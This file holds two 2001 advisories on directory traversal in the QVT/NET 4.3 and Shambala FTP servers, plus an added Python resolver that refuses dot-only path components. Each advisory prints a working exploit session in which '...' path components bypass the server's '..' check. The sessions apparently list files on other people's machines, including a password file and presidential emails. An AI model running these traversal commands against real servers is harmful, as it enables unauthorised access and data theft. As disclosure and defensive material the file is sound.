📄 alt3kx-advisories-2001.txt
======================================================================
 QVT/NET 4.3 FTP server Directory Traversal

Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org
Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x no rulas wey!
======================================================================

------------------------=[Brief Description]=-------------------------

QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory, list the files in
that path, and GET files remotely.

----------------------------=[Platforms]=-------------------------------

Windows 9.x
Windows NT
Windows 2000

-----------------------------=[Summary]=---------------------------------

When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.

Exploit:

C:\>ftp server.vulnerable.com
Connected to server.vulnerable.com.
220 shell FTP server (QVT/Net 4.3) ready.
User (server.vulnerable.com:(none)): anonymous
331 Guest login OK, please send real ident as password.
Password:
230 Guest login OK, access restrictions apply.
ftp> cd ..
501 CWD command not allowed.

SO THE BUG...
...

ftp>cd .../.../.../.../.../.../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes).
-rwxrwxrwx 1 nobody system 246928 Jan 18 13:10 nc.exe
drwxrwxrwx 1 nobody system 0 Jan 18 15:39 Netscape 6
drwxrwxrwx 1 nobody system 0 Jan 18 14:50 Netscape 6 Setup
-rwxrwxrwx 1 nobody system 3209110 Jan 19 10:51 icq.exe
-rwxrwxrwx 1 nobody system 6330449 Jan 19 12:01 porn.exe
drwxrwxrwx 1 nobody system 0 Jan 18 17:44 norton
drwxrwxrwx 1 nobody system 0 Jan 19 11:14 Program Files
drwxrwxrwx 1 nobody system 0 Jan 19 12:04 plugins
....
-rwxrwxrwx 1 nobody system 0 May 4 13:05 hacksites.txt
drwxrwxrwx 1 nobody system 0 May 4 16:51 XXXX
drwxrwxrwx 1 nobody system 0 May 8 13:17 teens
drwxrwxrwx 1 nobody system 0 May 8 13:18 tmp
-rwxrwxrwx 1 nobody system 168 May 21 19:07 raza-alt3kx.txt
226 Transfer complete.
ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec.
ftp> get raza-alt3kx.txt
200 PORT command successful.
150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106) (168 bytes).
226 Transfer complete.
ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec.
ftp>quit
221 Goodbye.
C:\>type raza-alt3kx.txt
Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>
C:\>

-------------------------------=[Patch]=---------------------------------

The recommended action is to change the permissions, or to define an
individual directory for anonymous users that holds no compromising
files.

-------------------------=[Company Compromise]=--------------------------

Company: http://www.qpc.com

======================================================================
 Shambala FTP server Directory Traversal

Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org
Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x no rulas weyete!
======================================================================

------------------------=[Brief Description]=-------------------------

Shambala FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory, list the files in
that path, and GET files remotely.

----------------------------=[Platforms]=-----------------------------

Windows 9.x
Windows NT
Windows 2000

-----------------------------=[Summary]=---------------------------------

When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.

Exploit:

alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
d--------- owner group 0 21-maj-01 17:50 1.xx.xx.xx
---------- owner group 283 21-maj-01 17:55 index-_-1_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-2_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-3_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-4_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-5_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-6_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-7_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-8_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-9_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-10_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-11_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-12_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-13_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-14_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-15_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-16_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_0_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_0_0_-1.htm
---------- owner group 283 21-maj-01 17:55 .htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-2.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-3.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-4.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-5.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-6.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-7.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-8.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-9.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-10.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-11.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-12.htm
---------- owner group 283 21-maj-01 18:08 index-_0_-1_-11.htm
---------- owner group 283 21-maj-01 18:08 index-_1_0_-11.htm
---------- owner group 283 21-maj-01 18:08 index-_-1_0_-11.htm
226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>

EXPLOIT...
...

ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 15444 04-maj-01 14:26 SCAN.log
---------- owner group 140340 04-maj-01 14:05 MAILS-PRESIDENCIA.txt
---------- owner group 466944 18-sep-99 09:32 Shambala.exe
---------- owner group 3564 21-maj-01 17:48 ST6UNST.LOG
---------- owner group 31 21-maj-01 17:50 passwordsxxx.txt
d--------- owner group 0 21-maj-01 17:50 Web
226 Transfer complete.
ftp>
ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 246928 18-jan-01 13:10 N6Setup.exe
d--------- owner group 0 18-jan-01 15:39 Netscape 6
d--------- owner group 0 18-jan-01 14:50 Netscape 6 Setup
---------- owner group 3209110 19-jan-01 10:51 getrgt.exe
.....
---------- owner group 168 21-maj-01 19:07 raza-alt3kx.txt
ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.
alt3kx@machine:/tmp$ cat raza-alt3kx.txt
Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>
alt3kx@machine:/tmp$

-------------------------------=[Patch]=------------------------------

The recommended action is to change the permissions, or to define an
individual directory for anonymous users that holds no compromising
files.

-------------------------=[Company Compromise]=-----------------------

http://www.evolvable.com
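
Both transcripts show the server refusing a ".." component while accepting "..." components. The following is an added example, not code from QVT/Net, Shambala or the advisory author: a CWD argument resolver that refuses dot-only components and keeps ".." inside the FTP root. `naive_filter` is only an assumed model of the flawed check, and all function names and sample arguments are constructed for illustration.

```python
import re

SEPARATORS = re.compile(r"[\\/]+")  # accept both FTP and Windows separators


def naive_filter(arg):
    """Assumed model of the flawed check: only a literal '..' is refused."""
    return ".." not in SEPARATORS.split(arg)


def resolve_virtual(cwd, arg):
    """Resolve a CWD argument against the virtual directory cwd ('/' is the
    FTP root). Returns the new virtual path or raises ValueError."""
    absolute = arg.startswith(("/", "\\"))
    stack = [] if absolute else [c for c in cwd.split("/") if c]
    for comp in SEPARATORS.split(arg):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not stack:
                raise ValueError("attempt to climb above the FTP root")
            stack.pop()
            continue
        # Names made only of dots and spaces ("...", ".. ", ". .") are
        # interpreted differently by different Windows versions, so they are
        # refused instead of being handed to the file system.
        if comp.rstrip(" .") == "":
            raise ValueError("ambiguous dot-only component: %r" % comp)
        stack.append(comp)
    return "/" + "/".join(stack)


def check(cwd, arg):
    """Wrapper that reports a rejection as a string instead of raising."""
    try:
        return resolve_virtual(cwd, arg)
    except ValueError as exc:
        return "REJECTED (%s)" % exc


# Constructed sample arguments, modelled on the commands in the transcripts.
SAMPLES = ["..", ".../.../.../", "/.../.../", "pub/../incoming", "pub/.. /x"]

if __name__ == "__main__":
    for arg in SAMPLES:
        print("%-18r naive_ok=%-5s hardened=%s"
              % (arg, naive_filter(arg), check("/", arg)))
```

The resolved virtual path should still be joined to the real root and checked for containment after the operating system has canonicalised it, since this function only reasons about the string.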